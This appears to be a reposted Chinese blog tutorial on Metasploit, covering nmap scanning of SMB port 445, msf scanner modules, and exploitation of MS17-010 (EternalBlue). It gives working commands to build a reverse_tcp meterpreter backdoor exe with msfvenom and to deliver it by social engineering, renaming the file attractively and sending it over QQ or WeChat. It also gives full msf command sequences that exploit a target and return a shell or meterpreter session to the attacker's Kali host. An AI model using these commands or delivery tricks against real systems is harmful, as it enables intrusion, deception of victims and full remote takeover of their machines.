Metasploit 简称 msf

转载:https://blog.csdn.net/qq_37615098/article/details/103555751
(msf5>banner 看一些花里胡哨的东西)
1.nmap 与 msf 配合的完整案例
nmap 与 msf 配合的流程
在这里插入图片描述

第一个环节
漏洞发布
在这里插入图片描述
在这里插入图片描述
如果是微软的,微软网站上会有的(如:MS08-067,前面 08 是年份,后面 067 是批次)

https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2008/ms08-067
https://sec-wiki.com/很详细

第二环节
在这里插入图片描述
确定需求,执行扫描,进行初步确认
确定下来扫描的指定网段,很多公司可能不止一个网段 (可能:192.168.,172.,10.,),然后就用:nmap -sV -p 445 192.168.29.0/24(看一下这个网段里面,哪些设备的 445 端口是开着的。445,就是这个漏洞可以利用的端口)
扫出来 IP,说明潜在的,有漏洞的可能的
第三环节
在这里插入图片描述
进一步确认:用 google 黑客语法,查找合适的 nmap 脚本
在这里插入图片描述
在这里插入图片描述
site:"nmap.org" ms08-067(指定网站到 nmap.org 上,查这个 ms08-067 漏洞编号,用什么脚本去精确定位)
第三环节
精确打击:可以是脚本的形式(.rc 文件)也可以是命令行交互模式.成功的话,就会拿到 shell
在这里插入图片描述

MSF 的用法

Metasploit 对主机扫描和识别
在这里插入图片描述

msf可以调用nmap,可以不离开msf的界面做所有的事情,前面加一个db_nmap就可以了
db_nmap -sV 192.168.29.160(扫描主机和端口)

Metasploit SMB 端口扫描
在这里插入图片描述

用scanner模块(auxiliary:辅助的;scanner:扫描的)
smb_version这个模块就是针对445的
设定目的主机的范围:set RHOSTS 192.168.29.150-170
设线程程,也可以不设,不设的话,后台就一个线程:set THREADS 11

社工欺骗
在这里插入图片描述

就是做后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.151 LPORT=1234 -f exe > hello.exe (LHOST=192.168.111.151,自己的ip)
    -f:文件类型
上面是linux上的一条命令,属于msf的一个工具集。就是指定了LHOST=192.168.29.21 LPORT=1234这样的参数,生成了exe文件,还可以注入到别的程序中去,加一个-x(后面是在windows上执行的)

12

把这个文件生成好了,通过社工欺骗的方法(给exe文件起一个好听的名字,通过QQ,微信等发送出去)
是一个反向连接。
在本地器监听(这个功能几乎等价于nc,这里是通过msf来完成的)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
meterpreter 这个模式:
在这里插入图片描述

    进入这个状态,比shell还牛逼。就是完全接管肉鸡了
    help查看
    sysinfo:查看对方信息
    ps:看进程
就是先生成一个伪造的exe文件
在一个就是,通过社工发给对方
自己这边启监听,等待就行

msfvenom 生成 webshell 脚本
msfvenom 生成别的类型的 webshell 脚本
在这里插入图片描述
全球爆发勒索病毒"永恒之蓝"
在这里插入图片描述
永恒之蓝 MS17-010 漏洞
在这里插入图片描述
根据漏洞编号,精确地找到定位脚本
攻击他:
在这里插入图片描述
调用扫描模块(如果 nmap 扫出来,这里就不需要调用扫描模块了)
扫描模块一般带有 scanner 字样
不是所有漏洞都有扫描模块的
在这里插入图片描述
在这里插入图片描述
调用攻击模块

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.111.128        (设定攻击目标)
run                 (发起进攻)

在这里插入图片描述

show targets(显示 targets 细节)

MSF - meterpreter
(可用 win7,win8 演示)
是 msf 最强有力的一个模块,超越 shell,抓摄像头等一系列东西
在这里插入图片描述
MSF 命令:

(RHOST,PAYLOAD大小写没事)
正向连接:
use windows/smb/ms17_010_eternalblue
set RHOST 192.168.111.128        (目标机)
set PAYLOAD windows/shell/bind_tcp
set LHOST 192.168.111.151        (自己的kali)
run
反向连接:
use windows/smb/ms17_010_eternalblue
set RHOST 192.168.111.128        (目标机)
set LHOST 192.168.111.151        (自己的kali)
set payload windows/x64/meterpreter/reverse_tcp(反向的)
run

一般来说:正向的是会到 shell 状态
反向的是到:meterpreter(超级接管的状态)

meterpreter 口令
在这里插入图片描述
注意:反向的是到:meterpreter(超级接管的状态)
在这里插入图片描述
在这里插入图片描述


↙↙↙阅读原文可查看相关链接,并与作者交流